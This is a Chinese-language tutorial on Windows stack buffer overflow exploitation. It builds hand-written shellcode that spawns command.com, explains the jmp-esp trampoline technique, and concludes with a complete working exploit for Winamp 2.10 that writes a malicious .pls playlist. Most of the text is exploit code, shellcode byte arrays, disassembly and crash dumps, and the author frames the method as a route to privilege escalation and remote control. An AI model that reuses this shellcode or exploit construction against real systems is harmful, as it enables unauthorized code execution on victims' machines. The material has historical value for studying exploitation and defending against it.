| |
◆原理篇
這一講我們來看看windows系統下的程序。我們的目的是研究如何利用windows程序的
堆棧溢出漏洞。
讓我們從頭開始。windows 98第二版
首先,我們來寫一個問題程序:
#include <stdio.h>
int main()
{
char name[32];
gets(name);
for(int i=0;i<32&&name[i];i++)
printf("\\0x%x",name[i]);
}
相信大家都看出來了,gets(name)對name數組沒有作邊界檢查。那么我們可以給程序
一個很長的串,肯定可以覆蓋堆棧中的返回地址。
C:\Program Files\DevStudio\MyProjects\bo\Debug>vunera~1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61
\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61\0x61
到這里,出現了那個熟悉的對話框“該程序執行了非法操作。。。”,太好了,點擊
詳細信息按鈕,看到EIP的值是0x61616161,哈哈,對話框還會把返回地址告訴我們。
這個功能太好了,我們可以選擇一個序列的輸入串,精確的確定存放返回地址的偏移位置。
C:\Program Files\DevStudio\MyProjects\bo\Debug>vunera~1
12345678910111213141516171819202122232425262728293031323334353637383940
\0x31\0x32\0x33\0x34\0x35\0x36\0x37\0x38\0x39\0x31\0x30\0x31\0x31\0x31\0x32\0x31
\0x33\0x31\0x34\0x31\0x35\0x31\0x36\0x31\0x37\0x31\0x38\0x31\0x39\0x32\0x30\0x32
到這里,又出現了那個熟悉的對話框“改程序執行了非法操作。。。”,點擊詳細信息
按鈕,下面是詳細信息:
VUNERABLE 在 00de:32363235 的模塊
<未知> 中導致無效頁錯誤。
Registers:
EAX=00000005 CS=017f EIP=32363235 EFLGS=00000246
EBX=00540000 SS=0187 ESP=0064fe00 EBP=32343233
ECX=00000020 DS=0187 ESI=816bffcc FS=11df
EDX=00411a68 ES=0187 EDI=00000000 GS=0000
Bytes at CS:EIP:
Stack dump:
32383237 33303339 33323331 33343333 33363335 33383337 c0000005 0064ff68
0064fe0c 0064fc30 0064ff68 004046f4 0040f088 00000000 0064ff78 bff8b86c
哦哦,EIP的內容為0x32363235,就是2625,EBP的內容為0x32343233,就是2423,計算
一下可以知道,在堆棧中,從name變量地址開始偏移36處,是EBP的地址,從name變量
地址開始偏移40處,是ret的地址。我們可以給name數組輸入我們精心編寫的shellcode。
我們只要把name的開始地址放在溢出字符串的地址40就可以了。那么,name的開始地址
是多少呢?
通過上面的stack dump 我們可以看到,當前ESP所指向的地址0x0064fe00,內容為
0x32383237,那么計算得出,name的開始地址為:0x0064fe00-44=0x64fdd4。在windows
系統,其他運行進程保持不變的情況下。我們每次執行vunera~1的堆棧的開始地址都
是相同的。也就是說,每次運行,name的地址都是0x64fdd4。
講到這里,大家一定已經發現了這樣一個情況:在win系統中,由于有地址沖突檢測,
出錯時寄存器影像和堆棧影像,使得我們對堆棧溢出漏洞可以進行精確的分析
溢出偏移地址。這就使我們可以精確的方便的尋找堆棧溢出漏洞。
OK,萬事具備,只差shellcode了。
首先,考慮一下我們的shellcode要作什么?顯然,根據以往的經驗,我們想開一個
dos窗口,這樣在這個窗口下,我們就可以作很多事情。
開一個dos窗口的程序如下:
#include <windows.h>
typedef void (*MYPROC)(LPTSTR);
int main()
{
HINSTANCE LibHandle;
MYPROC ProcAdd;
char dllbuf[11] = "msvcrt.dll";
char sysbuf[7] = "system";
char cmdbuf[16] = "command.com";
LibHandle = LoadLibrary(dllbuf);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
(ProcAdd) (cmdbuf);
return 0;
}
這個程序有必要詳細解釋一下。我們知道執行一個command.com就可以獲得一個
dos窗口。在C庫函數里面,語句system(command.com);將完成我們需要的功能。
但是,windows不像UNIX那樣使用系統調用來實現關鍵函數。對于我們的程序來說,
windows通過動態鏈接庫來提供系統函數。這就是所謂的Dll's。
因此,當我們想調用一個系統函數的時候,并不能直接引用他。我們必須找到那個
包含此函數的動態鏈接庫,由該動態鏈接庫提供這個函數的地址。DLL本身也有一個
基本地址,該DLL每一次被加載都是從這個基本地址加載。比如,system函數由msvcrt.dll
(the Microsoft Visual C++ Runtime library)提供,而msvcrt.dll每次都從
0x78000000地址開始。system函數位于msvcrt.dll的一個固定偏移處(這個偏移地址
只與msvcrt.dll的版本有關,不同的版本可能偏移地址不同)。我的系統上,
msvcrt.dll版本為(v6.00.8397.0)。system的偏移地址為0x019824。
所以,要想執行system,我們必須首先使用LoadLibrary(msvcrt.dll)裝載動態鏈接庫
msvcrt.dll,獲得動態鏈接庫的句柄。然后使用GetProcAddress(LibHandle, system)
獲得 system的真實地址。之后才能使用這個真實地址來調用system函數。
好了,現在可以編譯執行,結果正確,我們得到了一個dos框。
現在對這個程序進行調試跟蹤匯編語言,可以得到:
15: LibHandle = LoadLibrary(dllbuf);
00401075 lea edx,dword ptr [dllbuf]
00401078 push edx
00401079 call dword ptr [__imp__LoadLibraryA@4(0x00416134)]
0040107F mov dword ptr [LibHandle],eax
16:
17: ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
00401082 lea eax,dword ptr [sysbuf]
00401085 push eax
00401086 mov ecx,dword ptr [LibHandle]
00401089 push ecx
0040108A call dword ptr [__imp__GetProcAddress@8(0x00416188)]
00401090 mov dword ptr [ProcAdd],eax
;現在,eax的值為0x78019824就是system的真實地址。
;這個地址對于我的機器而言是唯一的。不用每次都找了。
18:
19: (ProcAdd) (cmdbuf);
00401093 lea edx,dword ptr [cmdbuf]
;使用堆棧傳遞參數,只有一個參數,就是字符串"command.com"的地址
00401096 push edx
00401097 call dword ptr [ProcAdd]
0040109A add esp,4
現在我們可以寫出一段匯編代碼來完成system,看以看我們的執行system調用的代碼
是否能夠像我們設計的那樣工作:
#include
#include
void main()
{
LoadLibrary("msvcrt.dll");
__asm {
mov esp,ebp ;把ebp的內容賦值給esp
push ebp ;保存ebp,esp-4
mov ebp,esp ;給ebp賦新值,將作為局部變量的基指針
xor edi,edi ;
push edi ;壓入0,esp-4,
;作用是構造字符串的結尾\0字符。
sub esp,08h ;加上上面,一共有12個字節,
;用來放"command.com"。
mov byte ptr [ebp-0ch],63h ;
mov byte ptr [ebp-0bh],6fh ;
mov byte ptr [ebp-0ah],6dh ;
mov byte ptr [ebp-09h],6Dh ;
mov byte ptr [ebp-08h],61h ;
mov byte ptr [ebp-07h],6eh ;
mov byte ptr [ebp-06h],64h ;
mov byte ptr [ebp-05h],2Eh ;
mov byte ptr [ebp-04h],63h ;
mov byte ptr [ebp-03h],6fh ;
mov byte ptr [ebp-02h],6dh ;生成串"command.com".
lea eax,[ebp-0ch] ;
push eax ;串地址作為參數入棧
mov eax, 0x78019824 ;
call eax ;調用system
}
}
編譯,然后運行。好,DOS框出來了。在提示符下輸入dir,copy......是不是想起了
當年用286的時候了?
敲exit退出來,哎呀,發生了非法操作。Access Violation。這是肯定的,因為我們的
程序已經把堆棧指針搞亂了。
對上面的算法進行優化,現在我們可以寫出shellcode如下:
char shellcode[] = {
0x8B,0xE5, /*mov esp, ebp */
0x55, /*push ebp */
0x8B,0xEC, /*mov ebp, esp */
0x83,0xEC,0x0C, /*sub esp, 0000000C */
0xB8,0x63,0x6F,0x6D,0x6D, /*mov eax, 6D6D6F63 */
0x89,0x45,0xF4, /*mov dword ptr [ebp-0C], eax*/
0xB8,0x61,0x6E,0x64,0x2E, /*mov eax, 2E646E61 */
0x89,0x45,0xF8, /*mov dword ptr [ebp-08], eax*/
0xB8,0x63,0x6F,0x6D,0x22, /*mov eax, 226D6F63 */
0x89,0x45,0xFC, /*mov dword ptr [ebp-04], eax*/
0x33,0xD2, /*xor edx, edx */
0x88,0x55,0xFF, /*mov byte ptr [ebp-01], dl */
0x8D,0x45,0xF4, /*lea eax, dword ptr [ebp-0C]*/
0x50, /*push eax */
0xB8,0x24,0x98,0x01,0x78, /*mov eax, 78019824 */
0xFF,0xD0 /*call eax */
};
還記得第二講中那個測試shellcode的基本程序嗎?我們可以用他來測試這個shellcode:
#include
#include
char shellcode[] = {
0x8B,0xE5, /*mov esp, ebp */
0x55, /*push ebp */
0x8B,0xEC, /*mov ebp, esp */
0x83,0xEC,0x0C, /*sub esp, 0000000C */
0xB8,0x63,0x6F,0x6D,0x6D, /*mov eax, 6D6D6F63 */
0x89,0x45,0xF4, /*mov dword ptr [ebp-0C], eax*/
0xB8,0x61,0x6E,0x64,0x2E, /*mov eax, 2E646E61 */
0x89,0x45,0xF8, /*mov dword ptr [ebp-08], eax*/
0xB8,0x63,0x6F,0x6D,0x22, /*mov eax, 226D6F63 */
0x89,0x45,0xFC, /*mov dword ptr [ebp-04], eax*/
0x33,0xD2, /*xor edx, edx */
0x88,0x55,0xFF, /*mov byte ptr [ebp-01], dl */
0x8D,0x45,0xF4, /*lea eax, dword ptr [ebp-0C]*/
0x50, /*push eax */
0xB8,0x24,0x98,0x01,0x78, /*mov eax, 78019824 */
0xFF,0xD0 /*call eax */
};
int main() {
int *ret;
LoadLibrary("msvcrt.dll");
ret = (int *)&ret + 2; //ret 等于main()的返回地址
//(+2是因為:有push ebp ,否則加1就可以了。)
(*ret) = (int)shellcode; //修改main()的返回地址為shellcode的開始地址。
}
編譯運行,得到dos對話框。
現在總結一下。我們已經知道了在windows系統下如何獲得一次堆棧溢出,如何計算
偏移地址,以及如何編寫一個shellcode以得到dos。理論上,你已經具備了利用堆棧溢出
的能力了,下面,我們通過實戰來真正掌握他。
◆溢出字符串的設計
我們已經知道了在windows系統下如何獲得一次堆棧溢出,如何計算
偏移地址,以及如何編寫一個shellcode以得到dos。
但是這遠遠不夠。
大家知道windows系統的用戶進程空間是0--2G,操作系統所占的為2--4G。
事實上用戶進程的加載位置為:0x00400000.這個進程的所有指令地址,數據地址
和堆棧指針都會含有0,那么我們的返回地址就必然含有0。
現在來看一看我們的shellcode:NNNNSSSSAAAAAA。顯然,我們的shellcode
由于A里面含有0,所以就變成了NNNNNNNNSSSSSA,這樣,我們的返回地址A必須精確
的放在確切的函數堆棧中的ret位置。
事實上,在上一講里面,我們已經掌握了很精確的找到這個位置的方法。
其次,windows在執行mov esp,ebp的時候,把廢棄不用的堆棧用隨機數據填充
(實驗所得,機制如何,大家一起研究),因此我們的shellcode可能會被覆蓋!
----這下完蛋了,我們的shellcode都沒了,返回地址正確又有什么用??
所以,我們的shellcode必須改成如下方式:NNNNNNNNNNNNNNNNNASSSSSSSSS,在緩沖區
溢出發生之后,堆棧的布局如下:
內存底部 內存頂部
buffer EBP ret
<------ [NNNNNNNNNNN][N ] [A ]SSSS
^&buffer
堆棧頂部 堆棧底部
看到了嗎?我們的A覆蓋了返回地址。S位于堆棧的底部。A的內容,就是指向S的調用。
但是,剛才我們說過A里面是含有0字符的,這樣的溢出字符串,在A處就被0阻斷,
根本無法到shellcode。我們需要把A改成不包含0的地址。
好像沒有辦法了,是嗎?現在我們的A如何能做到即可以跳轉到我們的shellcode,
又可以不包含0字節呢?
大家可能還記得當年IIS4.0遠程攻擊的作者dark spyrit AKA Barnaby Jack吧?
他在99年的Phrack Magzine55.15 上提出了使用系統核心dll中的指令來完成跳轉
的思想。我不得不說這是一個天才的想法。事實上,這一技巧開創了一個嶄新
的windows緩沖區溢出的思路。
思路是這樣的:返回地址A的內容不指向我們的shellcode開始地點,否則的話
A里面必然含有0。我們知道系統核心的dll都是在2-4G,也就是從0x80000000到
0xffffffff,這里面的指令地址將不包含0,(當然幾個別的除外,我們可以不用他)。
因此,我們可以令返回地址A等于一個系統核心dll中的指令的地址,這個指令的
作用就是call/jmp 我們的shellcode。
但是他怎么才能知道我們的shellcode的地址呢?
答案是:用寄存器。因為在溢出發生的時候,除了eip跳到了系統核心dll去之外,
其他的通用寄存器都保持不變。在寄存器里面一定有我們的shellcode的相關信息。
比如說,敵人的函數如果有參數的話,那么我們的A覆蓋了他的返回地址,shellcode
的開始地址則恰恰在他的第一個參數的位置上,那我們就可以用call [ebp+4]或者
我們假設敵人第一個參數的地址在eax,那我們就可以使用call/jmp eax來調用shellcode。
這些寄存器的值,我們可以在第一講里面提到的“關閉程序框”里面獲得寄存器和
堆棧的詳細資料。
那么我們怎么知道哪里有call/jmp eax什么的呢?我們又怎么知道這些指令是每次都在
內存中可以直接調用呢?
答案是:系統核心dll。系統核心dll包括kernel32.dll,user32.dll,gdi32.dll.
這些dll是一直位于內存中而且對應于固定的版本windows加載的位置是固定的。
你可以在這些dll里面搜索你需要的指令。其他的dll,比如msvcrt。dll就要去看程序
自己的import列表了。看看他是否load了這個dll。不過一般的說,這幾個dll就夠了。
好,那么我們的shellcode最終為:
NNNNNNNNNNNNNNNASSSSSSSS
其中:N為NOP指令
A為指向某一條call/jmp指令的地址,這個call/jmp指令位于系統核心內存>0x80000000,
這個call/jmp指令具體的內容,需要根據我們exploit出來的結果分析得知。
S:shellcode。
有了這些基礎知識,我們來分析一個實例。
大家都有winamp吧,他的2.10有緩沖區漏洞,下面我們來實現一個exploit。
winamp的playlist支持文件*.pls存放playlist。playlist里面的文件名長度
如果大于一定長度就會發生堆棧溢出。我們可以寫出測試串,精確的測試。
test.cpp
----------------------------------------------------------------------------
#include
int main()
{
char buffer[640];
char eip[8] = "";
char sploit[256] = "";
FILE *file;
for(int x=0;x<640;x++)
{
switch(x%4) {
case 0: buffer[x] = 'A';break;
case 1: buffer[x] = 'A'+x/26%26/26%26; break;
case 2: buffer[x] = 'A'+x/26%26; break;
case 3: buffer[x] = 'A'+x%26;break;
}
}
buffer[x]=0;
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
----------------------------------------------------------------------------
算法很簡單,是寫出一個crach.pls文件,內容可以根據那幾個fprintf看出來的。
我就不講了,其中buffer的內容為測試用的字符串。這個測試程序可以測試
最長為26^3的串,足夠了。
編譯執行,看看結果,嘿,發生了堆棧溢出,結果如下:
WINAMP 在 00de:4c574141 的模塊
<未知> 中導致無效頁錯誤。
Registers:
EAX=00000001 CS=017f EIP=4c574141 EFLGS=00000206
EBX=006da30c SS=0187 ESP=006da170 EBP=006da2f4
ECX=00000000 DS=0187 ESI=00445638 FS=4bd7
EDX=005b02dc ES=0187 EDI=00000001 GS=4206
Bytes at CS:EIP:
Stack dump:
50574141 54574141 58574141 42584141 46584141 4a584141
4e584141 52584141 56584141 5a584141 44594141 48594141
4c594141 50594141
根據eip=4141574c計算得出,addr = (57h-41h)*26+(4ch-41h)-4 = 580.
好,溢出的位置為580。
大家現在知道我們的溢出字符串中,返回地址A應該在串的580處,那么我們應該
讓他使用什么call/jmp指令以達到shellcode呢?
看看寄存器dump,我們發現ESP里面的內容是41415750,恰好是4141574c之后的
第一個數。看來ESP指向我們的shellcode,太棒了!我們使用指令:
jmp ESP 就可以執行我們的shellcode了。
現在找出jmp esp的指令碼為 FF E4,ctrl-D 調出s-ice,看看內存里面那里有FF E4.
因為系統核心dll的加載地址都是從地址0xBf000000開始,所以我們
搜索s Bf000000 L ffffffff ff,e4
得到了哪些結果?
一堆呀,這第一個是:BFF795A3。看看softice里面的進程名稱欄:
Kernel32!GetDataFormatA+1554好,是kernel32.dll里面的,肯定是可以用的啦。
ok,問題解決,我們現在可以確定在buffer〔580〕處,寫入四個字節:
"\xa3\x95\xf7\xbf".這就是我們的溢出字符串中的返回地址A。
好了,現在溢出字符串已經基本分析完了,就差shellcode了。
下面我們來寫shellcode。
我們的shellcode要開一個dos窗口。C語言的算法描述是:
LoadLibrary("msvcrt.dll");
system("command.com");
exit(0);
很簡單,是不是?下面是匯編代碼:
首先要LoadLibrary("msvcrt.dll");
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
mov edx,0xBFF776D4 //LoadLibrary
push edx
lea eax,[ebp-0Ch]
push eax
call dword ptr[ebp-10h]
然后是開一個dos窗口:
push ebp
mov ebp, esp
sub esp, 0000002C
mov eax, 6D6D6F63
mov dword ptr [ebp-0C], eax
mov eax, 2E646E61
mov dword ptr [ebp-08], eax
mov eax, 226D6F63
mov dword ptr [ebp-04], eax
xor edx, edx
mov byte ptr [ebp-01], dl
lea eax, dword ptr [ebp-0C]
push eax
mov eax, 78019824 //system
call eax
最后執行exit,退出來。
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFAAFB//exit
push edx
xor eax,eax
push eax
call dword ptr[ebp-04h]
簡單說一下,msvcrt.dll是運行C語言標準庫函數所必須的一個動態鏈接庫。
要想使用system,exit,必須加載這個庫。而winamp沒有import這個庫,
所譯我們需要自己加載。
指令 mov edx,0xBFF776D4中,0xBFF776D4是函數LoadLibraryA的地址。
他的代碼在kernel32.dll中,是被winamp加載了的dll。我的機器上kernel32.dll
版本是: (v4.10.2222) .
0x78019824 是msvcrt.dll里面的函數system的地址。版本:(v6.00.8397.0)
0x78005504 是msvcrt.dll里面的函數exit的地址。版本:(v6.00.8397.0)
由于里面有0,所以使用兩條指令來完成:
mov edx,0xFFFFFFFF
sub edx,0x87FFAAFB//==mov edx,0x78005504
編譯,找出二進制code:
shellcode:
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8\x24\x98\x01\x78\xFF\xD0"
"\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
好了,所有的算法都討論完了,下一講我們就來實現一個exploit
◆最后的完善
我們把前面寫的測試程序稍加改動就是一個exploit程序:
exploit.cpp
----------------------------------------------------------------------------
#include
int main()
{
char buffer[640];
char eip[8] = "\xa3\x95\xf7\xBF";
char shellcode[256] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"http://load
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8\x24\x98\x01\x78\xFF\xD0"
"\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
for(int x=0;x<580;x++)
{
buffer[x] = 0x90;
}
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", shellcode);
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
----------------------------------------------------------------------------
OK,運行他,生成一個文件叫做crash.pls.在winamp里面打開這個playlist,
就應該出一個dos。出來了嗎?
哎呀,怎么又是錯誤?
WINAMP 在 017f:004200c3 的模塊
WINAMP.EXE 中導致無效頁錯誤。
Registers:
EAX=00000001 CS=017f EIP=004200c3 EFLGS=00000206
EBX=006da30c SS=0187 ESP=006da171 EBP=006da2f4
ECX=00000000 DS=0187 ESI=00445638 FS=444f
EDX=005b02dc ES=0187 EDI=00000001 GS=4446
Bytes at CS:EIP:
00 85 f6 7d 06 03 35 dc 23 44 00 8b 6c 24 10 3b
Stack dump:
0a006da1 8000009d 0000442a 90000000 90909090 90909090
90909090 90909090 90909090 90909090 90909090 90909090
90909090 90909090 90909090 90909090
看看出錯信息,EIP是4200c3,看來已經開始執行我們的shellcode了,怎么會有
無效頁錯誤呢?看來我們的shellcode有問題。
這個時候,s-ice就又派上用場了,跟蹤一下看看:
ctrl-d
bpx bff795a3(就是我們的jmp esp)
x
好,現在運行winamp,打開文件crash.pls,被s-ice攔下,開始跟蹤。一個jmp esp
之后,就到了我們的shellcode上,繼續執行,看到了什么嗎?
奇怪!我們的shellcode變短了,到B8249801,后面就沒有了。這是怎么回事?
應該是\xB8\x24\x98\x01\x78呀,\x01到什么地方去了?
看來敵人把輸入的溢出字符串作樂處理,把不能作為文件名的字符都作為0處理了
(事實上這是win32api函數作的處理)。我們的shellcode被截斷了。
我在第4講第一節就說過對這種問題的對策。這個問題的解決需要我們改換shellcode,
去掉那些有問題的字符:\x01
我們作如下替換:
mov eax,78019824 ----> mov eax,ffffffff
sub eax,87fe67db
匯編得到:
xB8\x24\x98\x01\x78 ----> \xB8\xFF\xFF\xFF\xFF
\x2d\xdB\x67\xFe\x87
得到下面的新程序:
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
* modify by ipxodi 20-01-2k
* for windows98 the 2nd version and for a new shellcode.
* windows98 v 4.10.2222.A chinese version
* pII 366 with 64MB RAM(Not a good PC,en?)
* ipxodi@263.net
*/
#include
int main()
{
char buffer[640];
char eip[8] = "\xa3\x95\xf7\xbf";
char sploit[256] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8\xFF\xFF\xFF\xFF\x2d\xdB\x67\xFe\x87\xFF\xD0"
"\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
for(int x=0;x<580;x++)
{
buffer[x] = 0x90;
}
buffer[x]=0;
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
OK,運行他,生成一個文件叫做crash.pls.在winamp里面打開這個playlist,
結果如下,我可愛的dos出來了:
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.
D:\hacker\document\ipxodi>dir
.........................
........就不貼了.........
總結:
經過這次實戰的演練,大家一定對windows下的buffer overflow有了很深的掌握了。
我們可以看到,windows下的堆棧溢出攻擊和unix下的,原理基本相同。但是,
由于windows用戶進程地址空間分配和堆棧處理有其獨立的特點,導致了windows
環境下堆棧溢出攻擊時,使用的堆棧溢出字符串,與unix下的,區別很大。這也
是我在寫完linux下的堆棧溢出系列之后,另外寫windows系列的原因。
另外,大家從破解的過程中,可以發現我一再強調windows的版本。事實上,這
也導致了windows下的exploit不具有通用性。大家的windows版本不一,
而exploit使用了很多動態鏈接庫里面的庫函數,其地址都是與dll的版本有
關系的。不同的dll版本,里面的庫函數的偏移地址就可能(注意:是可能)
不同。因為windows的patch天天有,他的一些dll就更新很快。甚至可能不同
語言版本的windows,其核心dll的版本都不同。用戶的dll一變更,
那么,我們的exploit里面的shellcode就要重新寫。
為了解決這個問題,我想我們可以盡量減少固定地址的使用。即,使用
GetProcAddress來獲得我們將使用的每一個系統函數,當然這就大大加長了
我們的shellcode。但是,這也無法消除對kernel32.dll的中LoadLibrary和
GetProcAddress的地址的直接引用,因為這兩個是shellcode中最基本的
函數,自然就導致了對kernel32.dll版本的依賴。
這里奉勸大家,當你寫的exploit發生無效頁錯誤時,不要灰心。運行sice,
跟蹤你的shellcode,會發現問題的根源的。
因此,這也回答了去年xsz,littleworm它們的問題。當時我們實驗IIS4.0
的exploit總是沒有成功,client端執行完了以后server端我們經常看到
access violation的框,就是因為shellcode的版本依賴問題導致的。
所以,對于windows下的堆棧溢出exploit,必須公開原代碼,才能由其他人完成
別的版本的修改,這一點,大家以后公布exploit時,要記住。
說一句題外話:
很多人運行了堆棧溢出exploit以后沒有成功,就認為自己的機器沒有毛病。
對此,dark spyrit AKA Barnaby Jack曾有這樣的建議:
If the exploit failed......
Do not determine the threat to your servers solely on the results of one
public exploit - the vulnerability exists, fix it. If you think that was
the only demonstration code floating around you need your head examined.
以前咱們水木黑客版97年堆棧溢出大討論的時候,rainer就很高水平的探討過
windows下的buffer overflow。他的文章現在還在,大家可以去精華區看看。
不過當時只是探討原理,還停留在堆棧溢出的可行性,遠沒有探討利用他來攻擊。
我也曾經以為windows的堆棧溢出攻擊是不必要的。
后來,NT的中普通用戶獲取admin,我想到過仿照UNIX,搞緩沖區溢出攻擊。
因為NT里面有很多系統進程,都是以system賬號啟動的。如果我們可以將它們
overflow,按照上面的方法,可以得到dos,(NT下是cmd.exe),將擁有
超級用戶的權限。當然可以為所欲為了。
這只是windows NT下堆棧溢出攻擊的一個應用。去年,我研究IIS4.0的溢出之后,
發現帶有問題的windows網絡服務程序導致了windows堆棧溢出,可以幫助我們
獲得遠程控制。才認識到windows堆棧溢出攻擊將是一個很有研究價值的攻擊
手段。
在后續的研究中,有時候因為困難幾乎要放棄。好在有小懶蟲(sysword),
小四(hellguard),康師傅(kxn)這些網友
給我的督促和幫助。在此感謝,同時感謝以前一起討論過windows系列堆棧溢出
的朋友littleworm,xsz它們。
最后,我希望我的講座作為拋磚引玉,能夠引發大家更深入的探討。希望大家在
看了之后,能夠對windows堆棧溢出技術有一定了了解。如果大家能夠提出改進的
算法,或者發現新的exploit,就真正是光大了我們黑客版的精神。
讓我們以下面這句話共勉:
"If you assume that there's no hope, you guarantee there will be no hope.
If you assume that there is an instinct for freedom, there are
opportunities to change things."
-Noam Chomsky |